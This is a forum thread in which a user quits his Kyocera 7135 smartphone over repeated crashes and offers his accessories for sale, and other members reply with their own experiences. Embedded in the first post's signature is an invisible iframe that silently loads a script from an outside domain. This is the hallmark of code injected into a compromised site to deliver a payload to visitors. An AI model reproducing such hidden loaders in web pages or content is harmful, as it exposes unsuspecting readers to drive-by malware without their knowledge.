+ Reply to Thread

Thread: I'm out...

I'm out...

Well... that's it. After ten days of screwing with the phone and having a replacement shipped out to me, I cannot make a phone call or do much else without a fatal exception. This is with nothing installed on the phone, mind you. Fresh out of the box. I'm done. This is a bad product from a bad company being sold by an even-more-clueless company. I'm going back to Sprint and waiting for the i500. Anyone want to buy a stereo headset, extra battery or a 256MB SD card from me?

To you folks who say you've been using your 7135s for months with no problems, I can only think of two possibilities. 1) You managed to get one of the few 7135s that don't have massive hardware issues or 2) you have an Alltel unit that is somehow different than the VZW units (i.e. it actually works).

With a great deal of disgust,
    MEast<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

AJR
    I'm sorry to hear that your experience has been 'fatal' with the 7135. I've had the phone for 3 weeks now... ordered it direct from Verizon 800# and was shipped to me in 2 days. I have had 2 fatal exception errors... the first one happened when I turned off the phone to take a tour of the Jelly Belly factory... when I opened the flip to turn it back on, it showed a fatal exception error. I reset it and everything was fine. The second was when I tried to run Lemmings in wide-screen mode.

Other than this, the phone has worked great. I have it fully loaded too... I have less than 2MB free of the 16MB on the phone. I'm using LauncherX, have about 25 games loaded, 20 apps, HackMaster, 100 names/numbers in the address book, a few text and voice memos, and a few other things. I always have a 128MB Panasonic or 256MB Lexar SD card installed as well (I avoid SanDisk). I've had 3 different headsets until I finally got the Kyo stereo headset with answer button. I now have about 25 names programmed for voice dial with the push of the headset button. I play the MP3 player for an hour or two a day, and talk for about 2 hours a day on it! My battery is exhausted by the end of the day. I don't know what else I could do to push the 7135 to make it do what you're experiencing! And for you to have 2 defective ones out of the box is a bit astounding! I'm not saying the phone is perfect, but it's pretty damn good in my opinion! I wish you better luck on the i500.

DRC
    Sorry about your bad experience. I am interested in your 3 accessories. Thanks.
    DRC

Interesting. There are quite a few people here using the phone now without all those problems.

Sorry to see you go, good luck!

Have not had a single hard reset yet. I would buy your accessories, except I fear the bad luck associated with them.

pm or email me. i'm interested.